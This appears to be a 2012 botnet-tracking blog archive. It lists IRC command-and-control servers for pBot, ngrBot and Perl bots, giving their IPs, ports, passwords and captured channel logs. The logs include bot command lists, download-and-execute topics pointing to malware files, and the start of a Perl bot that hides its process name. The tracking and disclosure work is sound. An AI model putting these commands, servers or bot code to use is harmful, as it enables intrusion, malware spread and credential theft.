Month: April 2012

69.66.87.90(pBot hosted in United States Des Moines Des Moines Public Schools)

= COMMANDS ============================================================================ .user <password> //login to the bot .logout //logout of the bot .die //kill the bot .restart //restart the bot .mail <to> <from> <subject> <msg> //send an email .dns <IP|HOST> //dns lookup .download <URL> <filename> //download a file .exec <cmd> // uses shell_exec() //execute a command .cmd <cmd> // uses popen() //execute a

yaboyyoshi.info(ngrBot hosted in United Kingdom Redstation Limited)

Resolved : [yaboyyoshi.info] To [149.3.139.227] Remote Host Port Number yaboyyoshi.info 6969 PASS none Update from our anonymous friend: yaboyyoshi.info:5500 or 6969 pass: none channel #aryan# Now talking in #aryan# Topic On: [ #aryan# ] [ @dload http://jessieandthetoyboys.com.br/cc_sminer_4-29.exe 1 ] Topic By: [ Yoshi ] hosting infos: http://whois.domaintools.com/149.3.139.227

irc.s4l1ty.info(Linux bots hosted in Indonesia Jakarta Primanet)

“Private Bot” lol #!/usr/bin/perl # # Thanks To: irc.RoIrc.in ########## Configuration ############ my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]"); my $processo = $ps[rand scalar @ps]; $servidor=’irc.s4l1ty.info’ unless $servidor; my $porta=’6667′; my @canais=("#X"); my @adms=("s4l1ty"); # Anti Flood ( 6/3 Recomendado ) my $linas_max=10; my $sleep=5; my $nick = getnick(); my $ircname = getident2();

188.165.202.199(500 ngrBots hosted in France Paris Ovh Systems)

Server:188.165.202.199:7000 JOIN #team hell Local users: Current Local Users: 479 Max: 573 Global users: Current Global Users: 479 Max: 573 #team {DE|W7-64a}mkliatk!x@EFF4177A.A0F8E1F4.CC6C8B5.IP ~ZRt!Expl3it@IDFADM @Rejuven!Shlomi@IDFADM ~DAKiNE!Anonymous@IDFADM ~wGi!Nikka@IDFADM End of /NAMES list. :wGi!Nikka@IDFADM PRIVMSG #team :.usb on is funny how irc bots can steal passwd from chrome Session Start: Mon Apr 02 21:13:59 2012 Session Ident: #team

retk01.com(ngrBot hosted in razorservers.com)

Resolved : [retk01.com] To [208.83.233.194] Resolved : [retk01.com] To [208.83.234.66] Resolved : [retk01.com] To [208.83.232.90] Now talking in #asdf Topic On: [ #asdf ] [ ~pu http://hotfile.com/dl/151810986/ee21746/2abril.exe de5da5df4246178095743f3a7827f150 ~s -o ~s ] Topic By: [ google ] Modes On: [ #asdf ] [ +smntMu ] Now talking in #xp Topic On: [ #xp ] [

m49.no-ip.biz(irc botnet hosted in United Kingdom Burstnet Limited°

Remote Host Port Number m49.no-ip.biz 9876 PASS none Now talking in #AryaN Modes On: [AryaN ] [ +] Local users: Current Local Users: 311 Max: 317 Global users: Current Global Users: 311 Max: 317 Quits: Replace [nnscript@uNkn0wn.eu] (Client hat die Verbindung getrennt 14) Joins: New{IS-WN7-x64}2432505 [2432505@0wn3d-C0A9361D.du.xdsl.is] hosting infos: http://whois.domaintools.com/178.238.136.38